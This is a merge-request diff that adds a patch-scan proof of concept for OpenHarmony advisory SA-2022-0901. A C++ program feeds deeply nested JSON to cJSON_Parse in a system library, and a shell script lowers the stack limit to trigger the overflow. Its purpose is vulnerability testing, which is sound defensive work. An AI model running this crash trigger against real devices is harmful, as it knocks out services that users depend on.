!7782 提交OpenHarmony-SA-2022-0901动态测试用例

Merge pull request !7782 from jingyu123412/master

demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0901/poc.cpp

+/*
+ * Copyright (c) 2023 Huawei Device Co., Ltd.
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *     http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#include <stdio.h>
+#include <dlfcn.h>
+#include <unistd.h>
+
+/* The cJSON structure: */
+typedef struct cJSON
+{
+	struct cJSON *next;
+	struct cJSON *prev;
+	struct cJSON *child;
+	int type;
+	char *valuestring;
+	int valueint;
+	double valuedouble;
+	char *string;
+} cJSON;
+
+int main()
+{
+	void *handle;
+	// 打开共享库libsoftbus_server.z.so
+	handle = dlopen("/system/lib/libsoftbus_server.z.so", RTLD_LAZY);
+	if (!handle)
+	{
+		fprintf(stderr, "Error: %s\n", dlerror());
+		return 1;
+	}
+
+	// 获取函数cJSON_Parse地址
+     typedef cJSON* (*Func)(char*);
+     Func cJSON_Parse = reinterpret_cast<Func>(dlsym(handle, "cJSON_Parse"));
+     if (cJSON_Parse == NULL) {
+         fprintf(stderr, "Error: %s\n", dlerror());
+         dlclose(handle);
+         return 1;
+     }
+
+	// 准备一个具有900层嵌套结构的json数据
+	char *json_string = "{\"a\":[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]}";
+
+	cJSON *root = cJSON_Parse(json_string); // cJSON_Parse方法解析json数据
+	if (root == NULL)
+	{
+		// 解析json数据返回值为null，说明设置了最大嵌套层数，修复了漏洞
+		printf("OpenHarmony-SA-2022-0901 : not vulnerable\n");
+		return 1;
+	}
+	// 返回值不为null，没有修复漏洞，应该收到signal 11段错误提示
+	printf("OpenHarmony-SA-2022-0901 : vulnerable\n");
+      printf("But the vulnerability trigger failed\n");
+
+	return 0;
+}
+

demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0901/poc.sh

+#！/bin/bash
+# Copyright (C) 2023 Huawei Device Co., Ltd.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#    http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+
+#//OpenHarmony标准系统中cJSON库解析900层的嵌套json数据大概会占用60KB栈空间
+#修改栈的存储上限，模拟栈资源紧缺的情况，便于触发栈溢出
+#或者也可以继续增加嵌套的层数，使栈溢出，每增加一层会多占用64B的栈空间
+ulimit -s 60
+
+#运行poc可执行程序
+./poc